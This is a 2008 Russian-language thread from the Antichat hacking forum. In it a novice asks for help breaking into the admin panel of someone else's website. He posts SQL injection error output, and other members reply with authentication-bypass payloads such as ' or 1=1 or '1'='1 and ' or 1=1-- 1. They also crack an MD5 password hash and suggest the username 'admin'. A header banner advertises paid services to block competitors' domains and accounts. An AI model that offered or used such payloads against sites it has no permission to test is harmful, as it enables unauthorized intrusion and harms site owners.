Форум АНТИЧАТ - Уязвимосьть при авторизации

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Уязвимосьть при авторизации

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимосьть при авторизации

21.12.2008, 23:39

Tigerrr

Новичок

Регистрация: 19.12.2008

Сообщений: 6

Провел на форуме:
27915

Репутация: 0

Уязвимосьть при авторизации

Привет всем.
Вот заинтересовался одним сайтом... быстренько подобрал адрес к админке ****.ru/admin/
(по всей видимости там cms joomla ...еси правильно ...ну или както так)
И передомной несколько полей: лог. , пас., и защитная строка.

В качестве лога ввожу ' or '1'=1' и любой пас...
Мне выдает

Код:

Fatal error: Uncaught exception 'Exception' with message 'SELECT * FROM cms(íàçâàíèå ñàéòà)_admin.users WHERE login='' or '1'=1'' AND pass='b59c67bf196a4758191e42f76670ceba' AND is_deleted=0; ' in /usr/home/sites/*****.com/data/f/db.inc.php:43 Stack trace: #0 /usr/home/sites/********.com/data/f/db.inc.php(149): db::q('SELECT * FROM c...') #1 /usr/home/sites/*********/data/admin/parts/login.php(29): db::qfa('SELECT * FROM c...') #2 /usr/home/sites/********.com/data/admin/index.php(89): require_once('/usr/home/sites...') #3 {main} thrown in /usr/home/sites/********.com/data/f/db.inc.php on line 43

Я как новенький в етом деле незнаю че мне делать дальше... подскажите плз
пасиба заранее

21.12.2008, 23:43

ntldr

Постоянный

Регистрация: 04.12.2007

Сообщений: 424

Провел на форуме:
2364957

Репутация: 479

' or '1'=1'/* попробуй

21.12.2008, 23:44

master01

Познающий

Регистрация: 09.12.2008

Сообщений: 39

Провел на форуме:
172355

Репутация: 30

Попробуй логин :admin (если не подойдёт, ищи как ник админа на сайте)

Код:

 pass='b59c67bf196a4758191e42f76670ceba'

пасс был зашифрован MD5 : 1111
Возможно попадёшь в админку.

21.12.2008, 23:48

Tigerrr

Новичок

Регистрация: 19.12.2008

Сообщений: 6

Провел на форуме:
27915

Репутация: 0

Этот пас я вводил когда в логе было ' or '1'=1'

21.12.2008, 23:53

Tigerrr

Новичок

Регистрация: 19.12.2008

Сообщений: 6

Провел на форуме:
27915

Репутация: 0

При вводе ' or '1'=1'/* почти тоже самое

Код:

Fatal error: Uncaught exception 'Exception' with message 'SELECT * FROM cms*****_admin.users WHERE login='' or '1'=1'/\*' AND pass='698d51a19d8a121ce581499d7b701668' AND is_deleted=0; ' in /usr/home/sites/*****.com/data/f/db.inc.php:43 Stack trace: #0 /usr/home/sites/*****.com/data/f/db.inc.php(149): db::q('SELECT * FROM c...') #1 /usr/home/sites/*****.com/data/admin/parts/login.php(29): db::qfa('SELECT * FROM c...') #2 /usr/home/sites/*****.com/data/admin/index.php(89): require_once('/usr/home/sites...') #3 {main} thrown in /usr/home/sites/*****.com/data/f/db.inc.php on line 43

22.12.2008, 01:44

Tigerrr

Новичок

Регистрация: 19.12.2008

Сообщений: 6

Провел на форуме:
27915

Репутация: 0

люди, посоветуйте чтото, плиз... я уже незнаю что делать(

22.12.2008, 02:08

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Ты у меня ник сер, да))?
master01 вроде как все написал!
А если что то скинь мне Линк в личку.

22.12.2008, 02:09

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

Отправить сообщение для -m0rgan- с помощью ICQ

Может линк выложишь?
Людям так проще будет...

22.12.2008, 12:35

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

1. Для вопросов есть спец тема.
2. А почему ' or '1'=1'?
Попробуй: ' or 1=1 or '1'='1
Тогда запрос будет таким:

Код:

SELECT * FROM cms(íàçâàíèå ñàéòà)_admin.users WHERE login='' or 1=1 or '1'='1' AND pass='b59c67bf196a4758191e42f76670ceba' AND is_deleted=0;

т.е. условие выполнится.
Или попробуй: ' or 1=1-- 1

#10

22.12.2008, 12:40

~~TAKO~~

Banned

Регистрация: 17.12.2008

Сообщений: 9

Провел на форуме:
117291

Репутация: 3

Это не джумла, определенно, судя по путям:

Цитата:

/usr/home/sites/*****.com/data/f/db.inc.php

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Перехват Gsm пакетов	SNIFF	Сотовый фрикинг	16	27.12.2009 22:25
Команда исследователей из США представила новую технологию авторизации пользователей.	Mobile	Мировые новости	0	11.03.2006 12:33
Как «растянуть» аккумулятор	novichok	Сотовый фрикинг	4	28.02.2006 22:47
химия своими руками	silveran	Болталка	43	11.01.2006 22:05

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход